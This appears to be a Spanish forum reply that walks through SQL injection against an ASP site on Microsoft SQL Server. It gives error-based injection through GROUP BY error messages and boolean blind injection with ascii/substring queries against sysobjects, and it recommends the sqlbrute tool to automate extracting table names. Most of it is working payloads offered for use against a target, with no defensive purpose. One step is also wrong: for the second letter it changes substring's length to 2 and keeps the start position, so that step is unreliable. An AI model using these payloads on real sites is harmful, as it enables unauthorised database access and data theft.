Trata SELECT name FROM sysobjects where name like "%u" o si no para mi la mejor forma siempre es tratar de explotar el error de sql y asi podremos obtener datos de la tabla. Ej:
http://www.server.com/news.asp?id=[SQL] se puede explotar de mucha maneras resultado:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'NEWS.PageTitle' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/functions/dbfunctions.asp, line 185
Ya tenermos nuestro primer campo podemos usar el gruop by [Campo] hasta q la web de el resultado deseado
Ej:
http://www.server.com/news.asp?id=1%20group by NEWS.PageTitle
NEWS.PageTitle
NEWS <------ Tabla
PAgeTitle <------- Campo
Tambien se puede saber el nombre de cualquier campo usando una operacion usando un blind sql injection
Ej:
Al usar el la Ej:
http://www.server.com/news.asp?id=1 and 1=1-- muestra un dato en la web el cual es verdadero
si utilizamos Ej:
http://www.server.com/news.asp?id=1 and 1=2-- es falso muestra otro datos en la web
Ya que conocemos cual son las respuesta en los caso FALSE and TRUE podemos usar esta sentencia
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1)))<97
convierte a caract + minuscala + extrae + de la tabla una si la primera letra es < 97 en ascii asi tendremos un resultado de la primera letra
este proceso se puede repetir hasta encontra la primera letra del nombre de la tabla para la segunda solo cambiamos
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,2)))<97 y continua el proceso hasta tener el nombre completo
este es un proceso largo por eso te recomiendo que uses sqlbrute para window que lo hace de manera automatica.
Espero que se a de tu ayuda y recuerda que hay miles de pagina con info sobre sql injection.
Pero si no solo dejame saber.....